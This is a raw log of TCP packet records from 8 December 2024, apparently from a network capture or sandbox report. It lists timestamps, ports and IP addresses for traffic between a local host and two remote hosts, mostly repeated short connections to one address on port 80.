                                                                                                                      Dec 8, 2024 15:27:00.047178984 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:00.047194004 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:27:00.047214031 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:00.047221899 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:27:00.047226906 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:00.047247887 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:27:00.047259092 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:00.047282934 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:27:00.047286987 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:00.047303915 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:27:00.047334909 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:27:00.047542095 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:27:00.047573090 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:27:00.047574997 CET44349730172.67.184.109192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:00.048122883 CET49730443192.168.2.4172.67.184.109
                                                                                                                      Dec 8, 2024 15:27:21.741293907 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:21.861030102 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:21.861154079 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:21.862191916 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:21.981498957 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:22.217119932 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:22.339502096 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:23.198961020 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:23.309899092 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:23.315932989 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:23.316003084 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:23.316046953 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:23.353552103 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:23.434418917 CET4974480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:23.473545074 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:23.554017067 CET8049744185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:23.554075956 CET4974480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:23.554249048 CET4974480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:23.673609972 CET8049744185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:23.700581074 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:23.784945011 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:23.819987059 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:23.904259920 CET4974480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:23.920501947 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:24.023679018 CET8049744185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:24.023690939 CET8049744185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:24.023700953 CET8049744185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:24.138971090 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:24.178987026 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:24.298376083 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:24.528738976 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:24.610380888 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:24.648154974 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:24.648231030 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:24.653666019 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:24.876287937 CET8049744185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:24.919321060 CET4974480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:24.968080044 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:25.013047934 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:25.108330011 CET8049744185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:25.153647900 CET4974480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:25.940593004 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:25.940973043 CET4974580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:26.009692907 CET4974480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:26.060331106 CET8049745185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:26.060344934 CET8049743185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:26.060404062 CET4974380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:26.060456991 CET4974580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:26.060688019 CET4974580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:26.129553080 CET8049744185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:26.129626036 CET4974480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:26.180046082 CET8049745185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:26.419344902 CET4974580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:26.538743973 CET8049745185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:26.538769960 CET8049745185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:26.538779974 CET8049745185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:26.804174900 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:26.809640884 CET4974580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:26.923564911 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:26.923630953 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:26.923719883 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:26.930682898 CET4974780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:26.972176075 CET8049745185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.042983055 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.050061941 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.050259113 CET4974780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.050385952 CET4974780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.075246096 CET8049745185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.075804949 CET4974580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.169717073 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.278898001 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.399382114 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.399426937 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.399445057 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.399465084 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.399477005 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.399487019 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.399532080 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.399564981 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.399594069 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.399647951 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.399724007 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.399732113 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.399761915 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.399770975 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.399776936 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.399806976 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.403839111 CET4974780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.519000053 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.519013882 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.519037008 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.519045115 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.519068956 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.519087076 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.519093037 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.519159079 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.523191929 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.560230970 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.560381889 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.638531923 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.638540983 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.679719925 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.679799080 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.720185995 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.840265036 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.840344906 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.935864925 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:27.936002970 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:27.959625006 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055501938 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055516005 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055571079 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055579901 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055660963 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055669069 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055742979 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055792093 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055839062 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055908918 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055951118 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.055973053 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056050062 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056291103 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056299925 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056421995 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056504965 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056581974 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056651115 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056752920 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056761026 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.056853056 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.057018042 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.057197094 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.261780977 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.309932947 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.380140066 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.434921980 CET4974780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.612236023 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.747561932 CET4974780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.822221041 CET4974780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.842046976 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.932205915 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.941884041 CET8049747185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.941962004 CET4974780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.961355925 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:28.961416960 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:28.961730957 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:29.048115969 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:29.080945969 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:29.310036898 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:29.429550886 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:29.429562092 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:29.429569960 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:29.984031916 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:29.984481096 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.104429007 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.104497910 CET8049746185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.104516029 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.104617119 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.104636908 CET4974680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.223833084 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.290189028 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.450773954 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.513072014 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.538415909 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.570185900 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.570198059 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.656686068 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.796426058 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.800362110 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.916338921 CET8049748185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.916387081 CET4974880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.919996023 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:30.920053959 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:30.922065020 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:31.041544914 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:31.299752951 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:31.419714928 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:31.419737101 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:31.419745922 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:31.437135935 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:31.544284105 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:31.676366091 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:31.747423887 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.238776922 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:32.450548887 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.472199917 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:32.588093042 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.588152885 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.588416100 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.708616018 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:32.708677053 CET8049749185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:32.708678007 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.708755016 CET4974980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.708889961 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.709120989 CET8049750185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:32.709187031 CET4975080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:32.829425097 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:33.060019970 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:33.179615974 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:33.179626942 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:33.179635048 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.033162117 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.075567007 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:34.269157887 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.309921980 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:34.390422106 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:34.509952068 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.510031939 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:34.510154009 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:34.629391909 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.856924057 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:34.976455927 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.976469040 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:34.976478100 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:35.831799030 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:35.872461081 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.064136028 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.106811047 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.181247950 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.181551933 CET4975380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.301233053 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.301326990 CET4975380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.301444054 CET4975380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.301532030 CET8049752185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.302261114 CET4975280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.421256065 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.656260014 CET4975380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.688575029 CET4975380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.688577890 CET4975480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.775778055 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.775788069 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.775809050 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.807945013 CET8049754185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.808085918 CET4975480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.808207989 CET4975480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.848170996 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.868927956 CET4975580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.934050083 CET8049754185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.991997004 CET8049755185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:36.992054939 CET4975580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:36.992156982 CET4975580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:37.113848925 CET8049755185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:37.153835058 CET4975480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:37.273298979 CET8049754185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:37.273308992 CET8049754185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:37.317292929 CET8049753185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:37.317373991 CET4975380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:37.341309071 CET4975580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:37.460750103 CET8049755185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:37.460761070 CET8049755185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:37.460768938 CET8049755185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:38.154244900 CET8049754185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:38.200575113 CET4975480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:38.312613964 CET8049755185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:38.358233929 CET4975580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:38.392328978 CET8049754185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:38.434979916 CET4975480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:38.552542925 CET8049755185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:38.606862068 CET4975580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:38.663780928 CET4975480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:38.663911104 CET4975580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:38.664132118 CET4975680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:38.783564091 CET8049756185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:38.783675909 CET8049754185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:38.783797979 CET4975480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:38.783801079 CET4975680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:38.784037113 CET4975680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:38.784557104 CET8049755185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:38.784687042 CET4975580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:38.903271914 CET8049756185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:39.056021929 CET8049751185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:39.056090117 CET4975180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:39.138390064 CET4975680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:39.258785963 CET8049756185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:39.258797884 CET8049756185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:39.258891106 CET8049756185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:40.115076065 CET8049756185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:40.169348001 CET4975680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:40.348371029 CET8049756185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:40.406296968 CET4975680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:40.498605013 CET4975780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:40.617945910 CET8049757185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:40.618063927 CET4975780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:40.618238926 CET4975780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:40.737514019 CET8049757185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:40.966372013 CET4975780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:41.085884094 CET8049757185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:41.085896015 CET8049757185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:41.085925102 CET8049757185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:41.938554049 CET8049757185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:41.984256983 CET4975780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:42.180918932 CET8049757185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:27:42.231839895 CET4975780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:42.313731909 CET4975780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:42.313941002 CET4975880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:27:42.433202982 CET8049758185.246.67.73192.168.2.4
